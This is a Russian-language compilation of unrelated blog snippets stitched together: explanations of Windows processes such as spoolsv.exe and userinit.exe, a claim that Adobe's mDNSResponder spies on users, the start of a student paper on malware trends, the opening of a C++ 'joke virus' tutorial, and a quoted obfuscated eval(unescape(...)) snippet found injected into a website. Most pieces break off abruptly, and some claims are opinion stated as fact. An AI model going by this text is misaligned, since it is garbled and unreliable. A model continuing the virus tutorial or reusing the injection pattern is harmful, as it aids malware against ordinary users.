spoolsv.exe — Это служба spooler ответственна за управление буферизацией печати для заданий печати и факсимильных заданий. В Службах она называется "диспетчер печати", если остановить службу, просецц исчезнет, но тогда можете забыть обо всём, что связано с принерами на вашем компьютере.

spoolsv.exe – отвечает за обработку процессов печати на локальном компьютере в операционных системах Microsoft Windows. В случае завершения процесса spoolsv.exe, локальный пользователь не сможет распечатывать задания на локальном принтере.

Что такое WinFXDocObj.exe

Уж очень подозрительное имя для системного файла =).Лежит в папке c:\windows\system32\winfxdocobj.exe.

Это системный процесс Microsoft Windows, в частности, Internet Explorer. У меня он появился после установки 8 версии Internet Explorer. Удалять его не рекомендуется, висячим в памяти я его ниразу не видел.

CSRSS.EXE – часть пользовательской Win32 подсистемы. SRSS - сокращение от "client/server run-time subsystem" (клиент/серверная подсистема). csrss отвечает за консольные приложения, создание/удаление потоков и за 16-битную виртуальную среду MS-DOS.

Что такое smax4pnp.exe?

Очередной процесс для изучения — smax4pnp.exe. Это кишки от драйвера звуковухи. Лежат в папке C:\Program Files\Analog Devices\Core\smax4pnp.exe. Записываются в автозагрузку для каких-то нужд.

Как я понимаю, это драйвер моей встроенной звуковой платы - SoundMAX service agent component, - а мне без звука скучно.  SMax4.exe и SMax4PNP.exe тоже относятся к звуковухе. Но SMax4PNP.exe я глушанул, так как, судя по инициалам, относится к plug&play, а я ничего нового пока в комп не втыкаю, и всё нормально. На счёт второго, пока в раздумье.

Что такое userinit.exe?

userinit.exe — системный вспомогательный процесс, висит в систему обычно в первые минуты запуска, потом тухнет. Весит 25 килобайт. Бывает его заменяют собой вирусы. Поэтому рекомендую пользоваться антивирусами.

Если при загрузке Windows XP сразу же за окном "Загрузка личных параметров..." следует окно "Завершение сеанса" то эта статья для Вас. Такое случается в тех случаях, когда Вашу систему поражает вирус. Он переименовывает настоящий файл userinit.exe или winlogon.exe на какие-то другие, а сам встает на их место, вызывая их сразу же после себя. Так вот, дело в том, что антивирусы "лечат" довольно странно, они удаляют файл не переименовав оригинал или (если оригинал был попросту удален) не восстановив.

Что такое AppServices.exe

Обнаружил в диспетчере задач странный процесс AppServices.exe.  Название довольно подозрительное. Начал рыть в инете и увидев слово Iomega вспомнил, что это я недавно нашел на работе списанный ZIP дисковод Iomega. Поразвлекался с ним и засунул обратно в шкаф а драйвер остался.

Заметил я как-то у себя в процессах какого-то левого парня, и это мне не очень понравилось. Стал копать в инете, нарыл много интересного.

Процессы mdnsNSP.dll и mDNSResponder.exe - за вами следят из ADOBE

Это не троян. Это "выдумки" славной Adobe Corporation - слежка за пользователями, купившими и не купившими ее продукт - Adobe Photoshop CS3. Насколько подобная вещь неправомерна, решать правозащитникам, на мой взгляд, давно пора уже, как в свое время одну всем нам знакомую софтверную компанию, наказать ее за это. Но пока суд да дело, нам стоит избавиться от "сего бонжура" - на это Вы имеете полное право: Ваш компьютер, Ваш реестр, что хотите, то и делаете, если не нарушаете явно подтвержденных Вами соглашений.

УДК 004.652

А.А.ЖУКОВ (СТУДЕНТ 3 КУРСА АСОУ), С.А. РЯДНОВ

Тенденции изменения вирусных платформ за 2005-2006 г.

Прошедший 2005 год принес с собой ощутимые изменения в мире вредоносного программного обеспечения (ПО). Количество детектируемых вредоносных программ выросло на конец года в среднем до 6368 экземпляров в месяц. Рост по итогам года составил 117%, что превышает прошлогодние показатели на 24% и отчетливо свидетельствует об увеличивающихся темпах роста рынка вредоносного ПО. [1]

Еще один исходник вируса на C++. Шутка с MS Word. Сейчас по шагам распишем, как устроен этот шутник.

Подключаем библиотеки и создаем основные переменные.

#include <windows.h>
#include <iostream.h>

WINAPI WinMain(HINSTANCE hint, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{

HKEY key;
char sysdir[256],
windir[256],
myname[256];

Узнаем свое имя функцией GetModuleFileName. И узнает адрес папки windows и папки system32 функциями GetWindowsDirectory и GetSystemDirectory

Чертовы барыги и их IFRAME трафик. Сегодня обнаружил, что на нескольких сайтах вылетают ошибки с сессиями и постоянно грузится какой-то левый сайт orentraff.cn.

Не долго ковырявшись в коде страниц обнаружил странный код:

<script type="text/javascript">
eval(unescape("%64%6F%63%75%6D%65%6E%74."));
</script>

Спросил у другана что за команды eval и unescape. eval - Выполняет код, а unescape - конвертирует символы.